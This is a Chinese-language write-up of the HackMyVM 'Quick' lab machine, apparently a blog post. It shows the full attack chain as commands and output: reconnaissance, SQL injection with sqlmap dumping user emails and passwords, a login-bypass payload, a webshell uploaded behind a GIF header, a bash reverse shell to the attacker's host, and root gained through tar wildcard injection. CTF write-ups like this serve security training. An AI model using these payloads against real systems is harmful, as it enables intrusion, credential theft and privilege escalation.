[HackMyVm] Quick

kali:192.168.56.104

主机发现

arp-scan -l
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:2c:4f:35       PCS Systemtechnik GmbH
192.168.56.113  08:00:27:aa:84:13       PCS Systemtechnik GmbH

靶机:192.168.56.113

端口扫描

nmap 192.168.56.113
22/tcp open  ssh
80/tcp open  http

目录扫描

gobuster dir -u http://192.168.56.113 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images               (Status: 301) [Size: 317] [--> http://192.168.56.113/images/]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 51414]
/.php                 (Status: 403) [Size: 279]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.113/img/]
/modules              (Status: 301) [Size: 318] [--> http://192.168.56.113/modules/]
/careers              (Status: 301) [Size: 318] [--> http://192.168.56.113/careers/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.113/css/]
/lib                  (Status: 301) [Size: 314] [--> http://192.168.56.113/lib/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.113/js/]
/customer             (Status: 301) [Size: 319] [--> http://192.168.56.113/customer/]
/404.html             (Status: 200) [Size: 5014]
/robots.txt           (Status: 200) [Size: 32]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.113/fonts/]
/employee             (Status: 301) [Size: 319] [--> http://192.168.56.113/employee/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]

发现比前几个quick系列多出来了employee目录

测试发现123@qq.com 和123@qq.com'#结果相同,123@qq.com'报错,说明存在sql注入

sqlmap跑一下请求包

sqlmap -l a.txt --batch --dbs
...
[*] `quick`
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

sqlmap -l a.txt --batch -D quick --tables
...
+-------+
| cars  |
| users |
+-------+

sqlmap -l a.txt --batch -D quick -T users --columns
+-----------------+-------------------------------------+
| Column          | Type                                |
+-----------------+-------------------------------------+
| name            | varchar(255)                        |
| role            | enum('admin','employee','customer') |
| email           | varchar(255)                        |
| id              | int                                 |
| password        | varchar(255)                        |
| profile_picture | varchar(255)                        |
+-----------------+-------------------------------------+
 
sqlmap -l a.txt --batch -D quick -T users -C "email,name,password,profile_picture" --dump

+------------------------+--------------+--------------------+----------------------+
| email                  | name         | password           | profile_picture      |
+------------------------+--------------+--------------------+----------------------+
| a.lucky@email.hmv      | Anna Lucky   | c1P35bcdw0mF3ExJXG | <blank>              |
| andrew.speed@quick.hmv | Andrew Speed | o30VfVgts73ibSboUP | uploads/3_andrew.jpg |
+------------------------+--------------+--------------------+----------------------+

字段就dump了几条没发现有用的东西,密码也登不上

但是登录界面可以用万能密码登上去

1' or 1#

找到一个上传点

上传一句话木马时候提示

 Invalid file type. Only JPEG, PNG, and GIF files are allowed.

添加一个GIF的文件头上传成功

根据数据库爆破出来的uploads/3_andrew.jpg猜测上传的头像位置在这

前面的数字试到2找到了文件位置

反弹shell

0=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261'
www-data@quick4:/home$ ls
ls
andrew
coos
jeff
john
juan
lara
lee
mike
nick
user.txt

home目录下有user.txt

在查看进程的时候发现

CMD: UID=0    PID=26400  | /bin/bash /usr/local/bin/backup.sh 

backup.sh有root权限

www-data@quick4:/var/www$ cat /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *

Linux提权系列 - tar - 掘金 (juejin.cn)

cd /var/www/html
echo "chmod u+s /usr/bin/bash" >shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
bash -p
www-data@quick4:/var/www/html$ echo "chmod u+s /usr/bin/bash" >shell.sh
echo "chmod u+s /usr/bin/bash" >shell.sh
www-data@quick4:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
<l$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@quick4:/var/www/html$ echo "" > "--checkpoint=1"
echo "" > "--checkpoint=1"
www-data@quick4:/var/www/html$ bash =p
bash =p
bash: =p: No such file or directory
www-data@quick4:/var/www/html$ bash -p
bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
whoami]
bash: line 2: whoami]: command not found
whoami
root

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值